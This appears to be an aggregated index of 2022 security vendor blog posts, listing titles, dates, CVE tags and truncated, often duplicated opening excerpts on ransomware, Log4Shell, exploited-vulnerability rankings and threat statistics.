Countries and territories where users faced the greatest risk of online infection
Local threat
Securelist
Non-mobile malware statistics, Q2 2022
blogs_securelist·2022-08-15
Non-mobile malware statistics, Q2 2022
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by criminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q2 2022
- IT threat evolution in Q2 2022. Non-mobile statistics
- IT threat evolution in Q2 2022. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q2 2022:
- Kaspersky solutions blocked 1,164,544,060 attacks from online resources across the globe.
- Web Anti-Virus recognized 273,033,368 unique URLs as malicious. Attempts to run malware fo
Talos
Quarterly Report: Incident Response Trends in Q2 2022
blogs_talos·2022-07-26
Quarterly Report: Incident Response Trends in Q2 2022
For the first time in more than a year, ransomware was not the top threat Cisco Talos Incident Response (CTIR) responded to this quarter, as commodity malware surpassed ransomware by a narrow margin. This is likely due to several factors, including the closure of several ransomware groups, whether it be of their own volition or the actions of global law enforcement agencies and governments.
Commodity malware was the top observed threat this quarter, a notable development given the general decrease in observations of attacks leveraging commodity trojans in CTIR engagements since 2020. These developments coincide with a general resurgence of certain email-based trojans in recent months, as law enforcement and technology companies have continued to attempt to disrupt and affect email-based m
Talos
Quarterly Report: Incident Response Trends in Q2 2022
blogs_talos·2022-07-26
Quarterly Report: Incident Response Trends in Q2 2022
## Quarterly Report: Incident Response Trends in Q2 2022
For the first time in more than a year, ransomware was not the top threat Cisco Talos Incident Response (CTIR) responded to this quarter, as commodity malware surpassed ransomware by a narrow margin. This is likely due to several factors, including the closure of several ransomware groups, whether it be of their own volition or the actions of global law enforcement agencies and governments.
Commodity malware was the top observed threat this quarter, a notable development given the general decrease in observations of attacks leveraging commodity trojans in CTIR engagements since 2020 . These developments coincide with a general resurgence of certain email-based trojans in recent months, as law enforcement and technology companies ha
Unit42
Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report
blogs_unit42·2022-07-21·CVSS 9.8
CVE-2017-5638 [CRITICAL] Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report
Threat Research Center
Trend Reports
Vulnerabilities
## Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report
Unit 42
Published: July 21, 2022
Trend Reports
Vulnerabilities
Apache Log4j
CVE-2017-5638
CVE-2017-9841
CVE-2018-19986
CVE-2019-02320
CVE-2019-19597
CVE-2019-9082
CVE-2020-14882
CVE-2020-14883
CVE-2020-15505
CVE-2020-15506
CVE-2020-25078
CVE-2020-5902
CVE-2021-21315
CVE-2021-22986
CVE-2021-26855
CVE-2021-31805
CVE-2021-34473
CVE-2021-35464
CVE-2021-38647
CVE-2021-40438
CVE-2021-40539
CVE-2021-41773
CVE-2021-42013
CVE-2021-44228
CVE-2021-45046
CVE-2022-22963
CVE-2022-22965
Network security trends
Unit 42 Network Threat Trends Research Report
## Executive Summary
Tens of thousands of vulnerabilities are repo
Unit42
Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report
blogs_unit42·2022-07-21·CVSS 9.8
[CRITICAL] Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report
## Executive Summary
Tens of thousands of vulnerabilities are reported every year, but not all are used by threat actors in real-world attacks. There are many reasons for this: a proof of concept (PoC) may not be available for attackers to weaponize, it may be too difficult to exploit the vulnerability, there may be a lack of accessible vulnerable software on the internet, or attackers may simply deem a vulnerability not worth exploiting due to low impact. Real-world defenders need real-world data on which vulnerabilities attackers are choosing to exploit – and where to focus protections.
In the 2022 Unit 42 Network Threat Trends Research Report, we’ve used data captured by the Palo Alto Networks Advanced Threat Prevention security service on Next-Generation Firewall and Prisma SASE from
Sentinelone
EDR for Cloud Workloads Running on AWS Graviton
blogs_sentinelone·2022-07-20
EDR for Cloud Workloads Running on AWS Graviton
SentinelOne is pleased to announce its EDR for cloud workloads has achieved the AWS Graviton Ready Designation for the AWS Graviton3 processor. AWS Graviton Ready solutions are vetted by AWS Partner Solution Architects to ensure customers have a consistent experience. As part of the AWS Graviton Ready Program, SentinelOne stands ready to help customers secure their Linux-based and containerized workloads, defending them from runtime threats such as cryptojacking malware and ransomware.
Graviton3 will be a boon for compute-intensive cloud workloads. Let’s start first with a brief intro to Graviton3, and then dive into the role of EDR in a multi-layered cloud security strategy.
## A Brief Overview of Graviton3
The Graviton3 processor is AWS’ 7th generation processor and is the second gene
Sentinelone
EDR for Cloud Workloads Running on AWS Graviton
blogs_sentinelone·2022-07-20
EDR for Cloud Workloads Running on AWS Graviton
SentinelOne is pleased to announce its EDR for cloud workloads has achieved the AWS Graviton Ready Designation for the AWS Graviton3 processor. AWS Graviton Ready solutions are vetted by AWS Partner Solution Architects to ensure customers have a consistent experience. As part of the AWS Graviton Ready Program, SentinelOne stands ready to help customers secure their Linux-based and containerized workloads, defending them from runtime threats such as cryptojacking malware and ransomware.
Graviton3 will be a boon for compute-intensive cloud workloads. Let’s start first with a brief intro to Graviton3, and then dive into the role of EDR in a multi-layered cloud security strategy.
## A Brief Overview of Graviton3
The Graviton3 processor is AWS’ 7th generation processor and is the second gene
Sentinelone
Top 6 Cyber Security Myths
blogs_sentinelone·2022-06-23
Top 6 Cyber Security Myths
The days when cyber security was merely a technical or niche issue to be dealt with by some small department in the basement are long behind us. Boards now have CISOs and CIOs, and yet there is still a need for all directors to understand the impact of cyber security risk when making strategic business decisions as well as to understand what to ask when a breach takes place.
Failing to grasp the nature of cyber security in today’s business environment can have dire consequences. Proper board preparedness and planning are critical both to protecting the business and to insulating officers and directors from liability. Accordingly, directors must ensure that the business is ready to face cyber risks and the potential legal ramifications of those risks by aligning the organization’s cyber ri
Sentinelone
Top 6 Cyber Security Myths
blogs_sentinelone·2022-06-23
Top 6 Cyber Security Myths
The days when cyber security was merely a technical or niche issue to be dealt with by some small department in the basement are long behind us. Boards now have CISOs and CIOs, and yet there is still a need for all directors to understand the impact of cyber security risk when making strategic business decisions as well as to understand what to ask when a breach takes place.
Failing to grasp the nature of cyber security in today’s business environment can have dire consequences. Proper board preparedness and planning are critical both to protecting the business and to insulating officers and directors from liability. Accordingly, directors must ensure that the business is ready to face cyber risks and the potential legal ramifications of those risks by aligning the organization’s cyber ri
Talos
Avos ransomware group expands with new attack arsenal
blogs_talos·2022-06-21
Avos ransomware group expands with new attack arsenal
## Avos ransomware group expands with new attack arsenal
By Flavio Costa ,
In a recent customer engagement, we observed a month-long AvosLocker campaign.
The attackers utilized several different tools, including Cobalt Strike , Sliver and multiple commercial network scanners.
The initial ingress point in this incident was a pair of VMWare Horizon Unified Access Gateways that were vulnerable to Log4Shell . While Cisco products were deployed on the network, the appliances were never configured, allowing the attacker to gain access to internal servers and maintain a foothold.
During the time the attacker was active in the network, several security events were detected by the security products but were not reviewed by the security team, which could have prevented the ransomware activity.
Talos
Avos ransomware group expands with new attack arsenal
blogs_talos·2022-06-21
Avos ransomware group expands with new attack arsenal
By Flavio Costa,
- In a recent customer engagement, we observed a month-long AvosLocker campaign.
- The attackers utilized several different tools, including Cobalt Strike, Sliver and multiple commercial network scanners.
- The initial ingress point in this incident was a pair of VMWare Horizon Unified Access Gateways that were vulnerable to Log4Shell. While Cisco products were deployed on the network, the appliances were never configured, allowing the attacker to gain access to internal servers and maintain a foothold.
- During the time the attacker was active in the network, several security events were detected by the security products but were not reviewed by the security team, which could have prevented the ransomware activity.
## Threat Actor Profile: Avos
Avos is a ransomware gro
Unit42
Network Security Trends: November 2021 to January 2022
blogs_unit42·2022-05-31
Network Security Trends: November 2021 to January 2022
Threat Research Center
Threat Research
Vulnerabilities
## Network Security Trends: November 2021 to January 2022
Yue Guan
Published: May 31, 2022
Threat Research
Vulnerabilities
Apache Log4j
Attack analysis
Denial of service
Exploit in Wild
Network security trends
## Executive Summary
Unit 42 researchers continually observe network attacks and search for insights that can assist defenders. Here, we summarize key trends from November 2021 to January 2022. In the following sections, we present our analysis of the most recently published vulnerabilities, including the severity distribution. We also classify vulnerabilities to provide a clear view of the prevalence of, for example, cross-site scripting or denial of service.
Cross-site scripting stood out as a commonly used t
Unit42
Network Security Trends: November 2021 to January 2022
blogs_unit42·2022-05-31·CVSS 9.8
[CRITICAL] Network Security Trends: November 2021 to January 2022
## Executive Summary
Unit 42 researchers continually observe network attacks and search for insights that can assist defenders. Here, we summarize key trends from November 2021 to January 2022. In the following sections, we present our analysis of the most recently published vulnerabilities, including the severity distribution. We also classify vulnerabilities to provide a clear view of the prevalence of, for example, cross-site scripting or denial of service.
Cross-site scripting stood out as a commonly used technique. Among around 6,443 newly published vulnerabilities, we found that a large portion (almost 10.6%) still involve this technique. However, by evaluating around 167 million attack sessions and focusing on the latest exploits in the wild, we conclude that remote code execution
Checkpoint
23rd May – Threat Intelligence Report
blogs_checkpoint·2022-05-23
CVE-2022-22675 23rd May – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 23rd May – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 23rd May, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Check Point Research has unveiled a targeted cyber-espionage operation against at least two research institutes in Russia, which are part of the Rostec Corporation, a state-owned defense conglomerate. The sophisticated campaign, which CPR dubbed “Twisted Panda”, has been attributed to Chinese threat actors, with possible connecti
Qualys
Put SecOps in the Driver’s Seat with Custom Assessment and Remediation
blogs_qualys·2022-05-20
Put SecOps in the Driver’s Seat with Custom Assessment and Remediation
## Table of Contents
Out-of-Band Processes Slow Response to Zero-Day Attacks
Introducing Qualys Custom Assessment and Remediation
See Qualys Custom Assessment and Remediation in Action
When zero-day threats emerge, time is of the essence. Security teams struggle to manage and respond to a range of challenges that often require custom approaches outside of existing vulnerability and security programs. Recently, many companies scrambled to mount their defenses against the Log4Shell vulnerability.
For example, a large health care provider knew it had to detect whether Log4Shell was present in its critical lifesaving systems. But to do so, the company had to develop custom scripts and scan its entire environment. The security team faced myriad challenges, from script deployment to evidenc
Qualys
Put SecOps in the Driver’s Seat with Custom Assessment and Remediation | Qualys
blogs_qualys·2022-05-20
Put SecOps in the Driver’s Seat with Custom Assessment and Remediation | Qualys
#### Table of Contents
- Out-of-Band Processes Slow Response to Zero-Day Attacks
- Introducing Qualys Custom Assessment and Remediation
- See Qualys Custom Assessment and Remediation in Action
When zero-day threats emerge, time is of the essence. Security teams struggle to manage and respond to a range of challenges that often require custom approaches outside of existing vulnerability and security programs. Recently, many companies scrambled to mount their defenses against the Log4Shell vulnerability.
For example, a large health care provider knew it had to detect whether Log4Shell was present in its critical lifesaving systems. But to do so, the company had to develop custom scripts and scan its entire environment. The security team faced myriad challenges, from script deployment to e
Qualys
CISA Alert: Top 15 Routinely Exploited Vulnerabilities
blogs_qualys·2022-05-06·CVSS 10.0
[CRITICAL] CISA Alert: Top 15 Routinely Exploited Vulnerabilities
## Table of Contents
CISAs Top 15 Routinely Exploited Vulnerabilities of 2021
Highlights of Top Vulnerabilities Cited in CISA 2021 Report
Log4Shell Vulnerability
ProxyShell: Multiple Vulnerabilities
ProxyLogon: Multiple Vulnerabilities
How Can Qualys Help?
Getting Started
The U.S. Cybersecurity & Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report’s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment.
The Cybersecurity & Infrastructure Security Agency (CISA) releases detailed alerts of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical insights in
Qualys
CISA Alert: Top 15 Routinely Exploited Vulnerabilities | Qualys
blogs_qualys·2022-05-06
CISA Alert: Top 15 Routinely Exploited Vulnerabilities | Qualys
#### Table of Contents
- CISAs Top 15 Routinely Exploited Vulnerabilities of 2021
- Highlights of Top Vulnerabilities Cited in CISA 2021 Report
- Log4Shell Vulnerability
- ProxyShell: Multiple Vulnerabilities
- ProxyLogon: Multiple Vulnerabilities
- How Can Qualys Help?
- Getting Started
The U.S. Cybersecurity & Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report’s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment.
The Cybersecurity & Infrastructure Security Agency (CISA) releases detailed alerts of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical i
Trendmicro
AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell
blogs_trendmicro·2022-05-02·CVSS 9.8
[CRITICAL] AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell
Ransomware
# AvosLocker Ransomware Variant Abuses Driver File to Disable Antivirus, Scans for Log4shell
We found an AvosLocker ransomware variant using a legitimate antivirus component to disable detection and blocking solutions.
By: Christoper Ordonez, Alvin Nieto
2022/05/02
Read time: ( words)
Save to Folio
We found samples of AvosLocker ransomware that makes use of a legitimate driver file to disable antivirus solutions and detection evasion. While previous AvosLocker infections employ similar routines, this is the first sample we observed from the US with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (asWarPot.sys). In addition, the ransomware is also capable of scanning multiple endpoints for the Log4j vulnerability Log4shell usin
Trendmicro
AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell
blogs_trendmicro·2022-05-02·CVSS 9.8
[CRITICAL] AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell
Ransomware
## AvosLocker Ransomware Variant Abuses Driver File to Disable Antivirus, Scans for Log4shell
We found an AvosLocker ransomware variant using a legitimate antivirus component to disable detection and blocking solutions.
By: Christoper Ordonez, Alvin Nieto May 02, 2022 Read time: ( words)
Save to Folio
We found samples of AvosLocker ransomware that makes use of a legitimate driver file to disable antivirus solutions and detection evasion. While previous AvosLocker infections employ similar routines, this is the first sample we observed from the US with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file ( asWarPot.sys ). In addition, the ransomware is also capable of scanning multiple endpoints for the Log4j vulnerability Log4shell
Trendmicro
AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell
blogs_trendmicro·2022-05-02·CVSS 9.8
[CRITICAL] AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell
Ransomware
## AvosLocker Ransomware Variant Abuses Driver File to Disable Antivirus, Scans for Log4shell
We found an AvosLocker ransomware variant using a legitimate antivirus component to disable detection and blocking solutions.
By: Christoper Ordonez, Alvin Nieto 2022/05/02 Read time: ( words)
Save to Folio
We found samples of AvosLocker ransomware that makes use of a legitimate driver file to disable antivirus solutions and detection evasion. While previous AvosLocker infections employ similar routines, this is the first sample we observed from the US with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file ( asWarPot.sys ). In addition, the ransomware is also capable of scanning multiple endpoints for the Log4j vulnerability Log4shell us
Trendmicro
AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell
blogs_trendmicro·2022-05-02·CVSS 9.8
[CRITICAL] AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell
Ransomware
## AvosLocker Ransomware Variant Abuses Driver File to Disable Antivirus, Scans for Log4shell
We found an AvosLocker ransomware variant using a legitimate antivirus component to disable detection and blocking solutions.
By: Christoper Ordonez, Alvin Nieto May 02, 2022 Read time: ( words)
Save to Folio
We found samples of AvosLocker ransomware that makes use of a legitimate driver file to disable antivirus solutions and detection evasion. While previous AvosLocker infections employ similar routines, this is the first sample we observed from the US with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file ( asWarPot.sys ). In addition, the ransomware is also capable of scanning multiple endpoints for the Log4j vulnerability Log4shell
Fortinet
Using EPSS to Predict Threats and Secure Your Network | FortiGuard Labs
blogs_fortinet·2022-04-29
Using EPSS to Predict Threats and Secure Your Network | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Using EPSS to Predict Threats and Secure Your Network
By Paolo Di Prodi | April 29, 2022
In the world of cybersecurity and threat intelligence, understanding what threats you might face next is critical to effectively securing your network. The Common Vulnerability Scoring System (CVSS) has been a valuable tool in this fight because it highlights how exploitable different vulnerabilities are. And now, EPSS (Exploit Prediction Scoring System) can supplement CVSS by providing dynamic insight into the likelihood that a vulnerability will be exploited. It produces a probability score of a rational number between 0.0 and 1.0, and the higher the score, the greater the probability that a vulnerability will be exploited.
In this blog, I will review the CVSS scori
Sentinelone
Enterprise Security Essentials | Top 15 Most Routinely Exploited Vulnerabilities 2022
blogs_sentinelone·2022-04-28·CVSS 9.8
[CRITICAL] Enterprise Security Essentials | Top 15 Most Routinely Exploited Vulnerabilities 2022
From remote code execution and privilege escalation to security bypasses and path traversal, software vulnerabilities are a threat actor’s stock-in-trade for initial access and compromise. In the past 12 months, we’ve seen a number of new flaws, including Log4Shell, ProxyShell, and ProxyLogon, being exploited in attacks against enterprises. These and other known bugs, some revealed as far back as 2017, continue to be routinely abused in environments where organizations have failed to properly inventory and patch. As CISA released its latest update on the most commonly exploited vulnerabilities, we take a look at each of the top 15 most routinely exploited bugs being used against businesses today.
## 1. Log4Shell (CVE-2021-44228)
Occupying top spot is the notorious flaw in the Apache Java
Sentinelone
Enterprise Security Essentials | Top 15 Most Routinely Exploited Vulnerabilities 2022
blogs_sentinelone·2022-04-28·CVSS 9.8
[CRITICAL] Enterprise Security Essentials | Top 15 Most Routinely Exploited Vulnerabilities 2022
From remote code execution and privilege escalation to security bypasses and path traversal, software vulnerabilities are a threat actor’s stock-in-trade for initial access and compromise. In the past 12 months, we’ve seen a number of new flaws, including Log4Shell, ProxyShell, and ProxyLogon, being exploited in attacks against enterprises. These and other known bugs, some revealed as far back as 2017, continue to be routinely abused in environments where organizations have failed to properly inventory and patch. As CISA released its latest update on the most commonly exploited vulnerabilities, we take a look at each of the top 15 most routinely exploited bugs being used against businesses today .
## 1. Log4Shell (CVE-2021-44228)
Occupying top spot is the notorious flaw in the Apache Jav
Talos
Quarterly Report: Incident Response trends in Q1 2022
blogs_talos·2022-04-26
Quarterly Report: Incident Response trends in Q1 2022
### Ransomware continues as the top threat, while a novel increase in APT activity emerges
Ransomware was still the top threat Cisco Talos Incident Response (CTIR) saw in active engagements this quarter, continuing a trend that started in 2020. As mentioned in the 2021 year-in-review report, CTIR continues to deal with an expanding set of ransomware adversaries and major cybersecurity incidents affecting organizations worldwide.
The first quarter of 2022 also featured an increase in engagements involving advanced persistent threat (APT) activity. This included Iranian state-sponsored MuddyWater APT activity, China-based Mustang Panda activity leveraging USB drives to deliver the PlugX remote access trojan (RAT), and a suspected Chinese adversary dubbed “Deep Panda” exploiting Log4j.
##
Talos
Quarterly Report: Incident Response trends in Q1 2022
blogs_talos·2022-04-26
Quarterly Report: Incident Response trends in Q1 2022
## Quarterly Report: Incident Response trends in Q1 2022
## Ransomware continues as the top threat, while a novel increase in APT activity emerges
Ransomware was still the top threat Cisco Talos Incident Response (CTIR) saw in active engagements this quarter, continuing a trend that started in 2020. As mentioned in the 2021 year-in-review report , CTIR continues to deal with an expanding set of ransomware adversaries and major cybersecurity incidents affecting organizations worldwide.
The first quarter of 2022 also featured an increase in engagements involving advanced persistent threat (APT) activity. This included Iranian state-sponsored MuddyWater APT activity , China-based Mustang Panda activity leveraging USB drives to deliver the PlugX remote access trojan (RAT), and a suspected C
Tenable
Hot Patches for Log4Shell Introduced Multiple Vulnerabilities in Amazon Web Services
blogs_tenable·2022-04-21
Hot Patches for Log4Shell Introduced Multiple Vulnerabilities in Amazon Web Services
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Unit42
AWS's Log4Shell Hot Patch Vulnerable to Container Escape and Privilege Escalation
blogs_unit42·2022-04-19·CVSS 8.8
CVE-2021-3100 [HIGH] AWS's Log4Shell Hot Patch Vulnerable to Container Escape and Privilege Escalation
Threat Research Center
Threat Research
Cloud Cybersecurity Research
## AWS's Log4Shell Hot Patch Vulnerable to Container Escape and Privilege Escalation
Yuval Avrahami
Published: April 19, 2022
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
Apache Log4j
AWS
Container escape
Containers
CVE-2021-3100
CVE-2021-3101
CVE-2021-44228
CVE-2022-0070
CVE-2022-0071
Log4j
Privilege escalation
## Executive Summary
Following Log4Shell , AWS released several hot patch solutions that monitor for vulnerable Java applications and Java containers and patch them on the fly. Each solution suits a different environment, covering standalone servers, Kubernetes clusters, Elastic Container Service (ECS) clusters and Fargate. The hot patches aren't exclusive to AWS environment
Unit42
AWS's Log4Shell Hot Patch Vulnerable to Container Escape and Privilege Escalation
blogs_unit42·2022-04-19·CVSS 8.8
[HIGH] AWS's Log4Shell Hot Patch Vulnerable to Container Escape and Privilege Escalation
## Executive Summary
Following Log4Shell, AWS released several hot patch solutions that monitor for vulnerable Java applications and Java containers and patch them on the fly. Each solution suits a different environment, covering standalone servers, Kubernetes clusters, Elastic Container Service (ECS) clusters and Fargate. The hot patches aren't exclusive to AWS environments and can be installed onto any cloud or on-premises environment.
Unit 42 researchers identified severe security issues within these patching solutions and partnered with AWS to remediate them. After installing the patch service to a server or cluster, every container in that environment can exploit it to take over its underlying host. For example, if you installed the hot patch to a Kubernetes cluster, every container
Fortinet
Enemybot: A Look into Keksec's Latest DDoS Botnet | FortiGuard Labs
blogs_fortinet·2022-04-12
Enemybot: A Look into Keksec's Latest DDoS Botnet | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Enemybot: A Look into Keksec's Latest DDoS Botnet
By Joie Salvio and Roy Tay | April 12, 2022
In mid-March, FortiGuard Labs observed a new DDoS botnet calling itself “Enemybot” and attributing itself to Keksec, a threat group that specializes in cryptomining and DDoS attacks.
This botnet is mainly derived from Gafgyt’s source code but has been observed to borrow several modules from Mirai’s original source code.
It uses several methods of obfuscation for its strings to hinder analysis and hide itself from other botnets. Furthermore, it connects to a command-and-control (C2) server that is hidden in the Tor network, making its takedown more complicated.
Enemybot has been seen targeting routers from Seowon Intech, D-Link, and exploits a recently reported
Tenable
Spring4Shell (CVE-2022-22965) FAQ: Spring Framework Remote Code Execution Vulnerability
blogs_tenable·2022-03-30·CVSS 9.8
[CRITICAL] Spring4Shell (CVE-2022-22965) FAQ: Spring Framework Remote Code Execution Vulnerability
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
ContiLeaks: Chats Reveal Over 30 Vulnerabilities Used by Conti Ransomware – How Tenable Can Help
blogs_tenable·2022-03-24
ContiLeaks: Chats Reveal Over 30 Vulnerabilities Used by Conti Ransomware – How Tenable Can Help
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Trendmicro
Attacks Abound in Tricky Threat Terrain: 2021 Annual Cybersecurity Report
blogs_trendmicro·2022-03-17
Attacks Abound in Tricky Threat Terrain: 2021 Annual Cybersecurity Report
## Attacks Abound in Tricky Threat Terrain: 2021 Annual Cybersecurity Report
The digital transformations that had enabled many enterprises to stay afloat amid the Covid-19 health crisis also brought about major upheavals in cybersecurity, the impact of which was still widely felt in 2021. In our annual cybersecurity report, we look back at 2021 in terms of the most significant security issues and trends that shaped the year’s threat landscape.
By: Trend Micro Research 2022/03/17 Read time: ( words)
Save to Folio
The digital transformations that had enabled many enterprises to stay afloat amid the Covid-19 health crisis also brought about major upheavals in cybersecurity, the impact of which was still widely felt in 2021. Trend Micro detected and blocked more than 94 billion threats ove
Trendmicro
Attacks Abound in Tricky Threat Terrain: 2021 Annual Cybersecurity Report
blogs_trendmicro·2022-03-17
Attacks Abound in Tricky Threat Terrain: 2021 Annual Cybersecurity Report
# Attacks Abound in Tricky Threat Terrain: 2021 Annual Cybersecurity Report
The digital transformations that had enabled many enterprises to stay afloat amid the Covid-19 health crisis also brought about major upheavals in cybersecurity, the impact of which was still widely felt in 2021. In our annual cybersecurity report, we look back at 2021 in terms of the most significant security issues and trends that shaped the year’s threat landscape.
By: Trend Micro Research
2022/03/17
Read time: ( words)
Save to Folio
The digital transformations that had enabled many enterprises to stay afloat amid the Covid-19 health crisis also brought about major upheavals in cybersecurity, the impact of which was still widely felt in 2021. Trend Micro detected and blocked more than 94 billion threats ove
Trendmicro
Attacks Abound in Tricky Threat Terrain: 2021 Annual Cybersecurity Report
blogs_trendmicro·2022-03-17
Attacks Abound in Tricky Threat Terrain: 2021 Annual Cybersecurity Report
## Attacks Abound in Tricky Threat Terrain: 2021 Annual Cybersecurity Report
The digital transformations that had enabled many enterprises to stay afloat amid the Covid-19 health crisis also brought about major upheavals in cybersecurity, the impact of which was still widely felt in 2021. In our annual cybersecurity report, we look back at 2021 in terms of the most significant security issues and trends that shaped the year’s threat landscape.
By: Trend Micro Research Mar 17, 2022 Read time: ( words)
Save to Folio
The digital transformations that had enabled many enterprises to stay afloat amid the Covid-19 health crisis also brought about major upheavals in cybersecurity, the impact of which was still widely felt in 2021. Trend Micro detected and blocked more than 94 billion threats o
Trendmicro
Cybersecurity-Report 2021: Schwieriges Terrain
blogs_trendmicro·2022-03-17
Cybersecurity-Report 2021: Schwieriges Terrain
## Attacks Abound in Tricky Threat Terrain: 2021 Annual Cybersecurity Report
The digital transformations that had enabled many enterprises to stay afloat amid the Covid-19 health crisis also brought about major upheavals in cybersecurity, the impact of which was still widely felt in 2021. In our annual cybersecurity report, we look back at 2021 in terms of the most significant security issues and trends that shaped the year’s threat landscape.
By: Trend Micro Research Mar 17, 2022 Read time: ( words)
Save to Folio
Originalartikel von Trend Micro Research
Die digitale Transformation, die es vielen Unternehmen ermöglichte, sich während der Covid-19-Krise zu behaupten, brachte aber auch erhebliche Herausforderungen für die Cybersicherheit mit sich, deren Auswirkungen auch 2021 deutlich z
Trendmicro
Attacks Abound in Tricky Threat Terrain: 2021 Annual Cybersecurity Report
blogs_trendmicro·2022-03-17
Attacks Abound in Tricky Threat Terrain: 2021 Annual Cybersecurity Report
## Attacks Abound in Tricky Threat Terrain: 2021 Annual Cybersecurity Report
The digital transformations that had enabled many enterprises to stay afloat amid the Covid-19 health crisis also brought about major upheavals in cybersecurity, the impact of which was still widely felt in 2021. In our annual cybersecurity report, we look back at 2021 in terms of the most significant security issues and trends that shaped the year’s threat landscape.
By: Trend Micro Research Mar 17, 2022 Read time: ( words)
Save to Folio
The digital transformations that had enabled many enterprises to stay afloat amid the Covid-19 health crisis also brought about major upheavals in cybersecurity, the impact of which was still widely felt in 2021. Trend Micro detected and blocked more than 94 billion threats o
Checkpoint
14th March – Threat Intelligence Report
blogs_checkpoint·2022-03-14·CVSS 8.1
CVE-2021-44207 [HIGH] 14th March – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 14th March – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 14th March, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Check Point Research has analyzed the Conti Ransomware gang’s chat leaks and revealed insights on the group’s Hi-tech company type of management, with physical offices, HR & finance departments and more. CPR published a detailed connection map exposing the organizational structure within the key members and affiliates of the
Tenable
Behind the Scenes: How We Picked 2021’s Top Vulnerabilities – and What We Left Out
blogs_tenable·2022-03-11
Behind the Scenes: How We Picked 2021’s Top Vulnerabilities – and What We Left Out
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
